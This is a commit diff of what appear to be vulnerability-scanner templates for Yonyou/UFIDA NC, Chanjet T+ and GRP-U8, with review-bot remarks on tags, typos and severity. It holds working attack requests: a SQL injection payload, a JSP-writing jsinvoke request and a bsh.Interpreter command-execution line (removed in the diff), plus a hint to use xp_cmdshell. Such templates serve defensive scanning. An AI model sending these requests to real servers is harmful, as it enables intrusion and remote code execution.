updated-templates-p
parent
88153faaf8
commit
274c14e763
|
@ -1,11 +1,11 @@
|
||||||
id: yonyou-nc-uapjs-jsinvoke-fileupload
|
id: CNVD-C-2023-76801
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Yonyou NC uapjs jsinvoke 文件上传漏洞
|
name: UFIDA NC uapjs - RCE vulnerability
|
||||||
author: SleepingBag945
|
author: SleepingBag945
|
||||||
severity: critical
|
severity: critical
|
||||||
description: 用友NC 及 NCC系统存在任意方法调用漏洞,通过uapjs (jsinvoke)利用漏洞可调用危险方法造成攻击。
|
description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
|
||||||
tags: yonyou
|
tags: cvnd,cvnd2023,yonyou,rce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -28,15 +28,3 @@ http:
|
||||||
- status_code_1 == 200
|
- status_code_1 == 200
|
||||||
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
|
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
|
||||||
# POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
|
|
||||||
# Host: {{Hostname}}
|
|
||||||
|
|
||||||
# {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
|
|
||||||
|
|
||||||
|
|
||||||
# POST /cmdb.jsp?error=bsh.Interpreter HTTP/1.1
|
|
||||||
# Host: {{Hostname}}
|
|
||||||
|
|
||||||
# cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
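Review bot: The new tag list `tags: cvnd,cvnd2023,yonyou,rce` misspells the advisory prefix; the id on the same side is `CNVD-C-2023-76801`, so it should read `tags: cnvd,cnvd2023,yonyou,rce`. As written, anyone selecting or excluding templates by the `cnvd` tag will silently miss this one. The new name says "RCE vulnerability", while the visible matcher only confirms that the `{{randstr_2}}` marker comes back in `body_2`. The request bodies are outside the visible hunks, so this is inferred, but the description could state what the check actually verifies.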
|
|
|
@ -10,7 +10,7 @@ info:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
fofa-query: app="ZyXEL-USG-FLEX"
|
fofa-query: app="ZyXEL-USG-FLEX"
|
||||||
verified: true
|
verified: true
|
||||||
tags: cve,cve2022,zyxel,auth-bypass
|
tags: cve,cve2022,zyxel,auth-bypass,router
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: SleepingBag945
|
author: SleepingBag945
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
|
Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
|
||||||
reference: |
|
reference: |
|
||||||
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
||||||
metadata:
|
metadata:
|
||||||
|
@ -38,14 +38,8 @@ http:
|
||||||
part: body_1
|
part: body_1
|
||||||
words:
|
words:
|
||||||
- "{\"RetCode\":0}"
|
- "{\"RetCode\":0}"
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body_2
|
part: body_2
|
||||||
words:
|
words:
|
||||||
- "{\"RetCode\":2}"
|
- "{\"RetCode\":2}"
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
|
@ -28,6 +28,7 @@ http:
|
||||||
- "<configuration>"
|
- "<configuration>"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: status
|
- type: word
|
||||||
status:
|
part: header
|
||||||
- 200
|
words:
|
||||||
|
- "application/octet-stream"
|
|
@ -3,7 +3,7 @@ id: chanjet-tplus-fileupload
|
||||||
info:
|
info:
|
||||||
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
|
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
|
||||||
author: SleepingBag945
|
author: SleepingBag945
|
||||||
severity: critical
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
|
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
|
||||||
reference:
|
reference:
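Review bot: The severity drops from `critical` to `high`, but the description kept on the new side still says the `preload` parameter bypasses authentication and lets an attacker upload files and control the server, which is the profile normally rated critical. Either keep `severity: critical`, or record the reasoning for the new rating (for example a `classification` block with the score) so that triage does not under-prioritise a finding. The unchanged `name:` line also spells the product `TPluse`; `name: UFIDA Chanjet TPlus Upload.aspx - Arbitrary File Upload` would match the description.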
|
||||||
|
|
|
@ -20,20 +20,15 @@ http:
|
||||||
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
|
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
Accept-Encoding: gzip
|
|
||||||
|
|
||||||
{"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
|
{"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "0x06d49632c9dc9bcb62aeaef99612ba6b"
|
- "0x06d49632c9dc9bcb62aeaef99612ba6b"
|
||||||
- "Message\":\"245"
|
- "Message\":\"245"
|
||||||
- "DatabaseException"
|
- "DatabaseException"
|
||||||
part: body
|
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
|
@ -1,21 +0,0 @@
|
||||||
id: chanjetcrm-createsite-sqli
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Chanjetcrm - create_site SQL Injection
|
|
||||||
author: unknown
|
|
||||||
severity: critical
|
|
||||||
description: |
|
|
||||||
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
|
|
||||||
reference:
|
|
||||||
- https://stack.chaitin.com/techblog/detail?id=10
|
|
||||||
tags: chanjetcrm,sqli
|
|
||||||
|
|
||||||
http:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}/WebSer~1/create_site.php?site_id=1"
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- "register fail,please again"
|
|
||||||
part: body
|
|
|
@ -1,4 +1,4 @@
|
||||||
id: yonyou-nc-filereceiveservlet-fileupload
|
id: yonyou-filereceiveservlet-fileupload
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
|
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
|
||||||
|
@ -12,7 +12,7 @@ info:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
fofa-query: app="用友-UFIDA-NC"
|
fofa-query: app="用友-UFIDA-NC"
|
||||||
verified: true
|
verified: true
|
||||||
tags: yonyou,nc,fileupload,intrusive
|
tags: yonyou,fileupload,intrusive
|
||||||
|
|
||||||
variables:
|
variables:
|
||||||
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
|
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
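Review bot: The id is renamed to `yonyou-filereceiveservlet-fileupload`, but the `name:` line next to it keeps the typo `Aribitrary`; `name: Yonyou NC FileReceiveServlet - Arbitrary File Upload` would fix it in the same change. The rename also changes the identifier that existing scan profiles, exclusion lists and stored results key on. This template is tagged `intrusive` and generates a `.jsp` file name, so a run that excluded it by the old id would pick it up again, which is worth calling out in the commit description. The name still says "NC" although `nc` is removed from both the id and the tags.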
|
|
@ -1,10 +1,10 @@
|
||||||
id: yonyou-grp-u8-sqli
|
id: yonyou-grp-u8-xxe
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: yonyou-grp-u8-sqli
|
name: Yonyou UFIDA GRP-u8 - XXE
|
||||||
author: SleepingBag945
|
author: SleepingBag945
|
||||||
severity: critical
|
severity: critical
|
||||||
description: 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行
|
description: UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
|
||||||
reference:
|
reference:
|
||||||
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
|
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
|
||||||
tags: yonyou,grp,xxe,sqli
|
tags: yonyou,grp,xxe,sqli
|
||||||
|
@ -14,26 +14,17 @@ http:
|
||||||
- |
|
- |
|
||||||
POST /Proxy HTTP/1.1
|
POST /Proxy HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
|
|
||||||
Accept: */*
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Accept-Encoding: gzip
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
|
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "1759837260"
|
- "1759837260"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<R9PACKET>"
|
- "<R9PACKET>"
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
|
|
||||||
# 可尝试启动并调用xpcmdshell执行命令
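Review bot: The English description inverts the cause: it says the flaw comes from "the application not loading external entities", whereas the issue is that external entity loading is not disabled, which is what the removed Chinese text appears to say apart from a typo. Suggested wording: `description: UFIDA GRP-u8 does not disable external entity loading when parsing XML input, which allows external SQL statements to be loaded and commands to be executed.` The id and name now say XXE, but the visible request sends `select 42540*41369` to `/Proxy`, the matcher looks for the product `1759837260`, and the reference is titled as a Proxy SQL injection. What the check confirms is therefore SQL evaluation, so keeping `sqli` in the id or saying so in the description would avoid mislabelled findings. With the status matcher removed, the two body words are the only signal left.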
|
|
|
@ -22,5 +22,5 @@ http:
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'status_code_1 == 200 && contains(body_1,"java.io")'
|
- 'status_code_1 == 200 && contains(body_1,"java.io") && contains(body_1,"EOFExceptionYI")'
|
||||||
condition: and
|
condition: and
|
|
@ -11,7 +11,7 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
fofa-query: icon_hash="1085941792"
|
fofa-query: icon_hash="1085941792"
|
||||||
verified: true
|
verified: true
|
||||||
tags: yonyou,nc,intrusive
|
tags: yonyou,intrusive,fileupload
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -13,7 +13,7 @@ info:
|
||||||
max-request: 2
|
max-request: 2
|
||||||
fofa-query: app="用友-UFIDA-NC
|
fofa-query: app="用友-UFIDA-NC
|
||||||
verified: true
|
verified: true
|
||||||
tags: yonyou,nc,intrusive
|
tags: yonyou,intrusive,ufida,fileupload
|
||||||
|
|
||||||
variables:
|
variables:
|
||||||
v1: "{{rand_int(1,100)}}"
|
v1: "{{rand_int(1,100)}}"
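Review bot: The `fofa-query` value on the unchanged context line is missing its closing quote: `fofa-query: app="用友-UFIDA-NC`. It still parses as a plain YAML scalar, but the string is likely not a valid search expression, so anyone using this metadata to inventory their own exposed instances may get an error or an empty result. `fofa-query: app="用友-UFIDA-NC"` matches the form used in the FileReceiveServlet template earlier in this commit. The same unterminated value appears in the metadata hunk of `yonyou-nc-ncmessageservlet-rce`; since the commit already edits the adjacent `tags:` line in both files, it could be fixed here.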
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
id: yonyou-nc-ncmessageservlet-rce
|
id: yonyou-nc-ncmessageservlet-rce
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: UFIDA NC NCMessageServlet - Deserialization RCE Detect
|
name: UFIDA NC NCMessageServlet - Deserialization RCE Detection
|
||||||
author: SleepingBag945
|
author: SleepingBag945
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
|
@ -12,7 +12,7 @@ info:
|
||||||
max-request: 2
|
max-request: 2
|
||||||
fofa-query: app="用友-UFIDA-NC
|
fofa-query: app="用友-UFIDA-NC
|
||||||
verified: true
|
verified: true
|
||||||
tags: yonyou,rce,deserialization,nc
|
tags: yonyou,rce,deserialization,rce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
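Review bot: The new tag list repeats a value: `tags: yonyou,rce,deserialization,rce`. It looks as if `nc` was meant to be removed, as in the other Yonyou templates in this commit, and was overwritten with a second `rce` instead; `tags: yonyou,rce,deserialization` is probably what was intended. A duplicate tag should not change matching, but it may be flagged by template linting and it skews tag-based statistics.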
|
||||||
|
|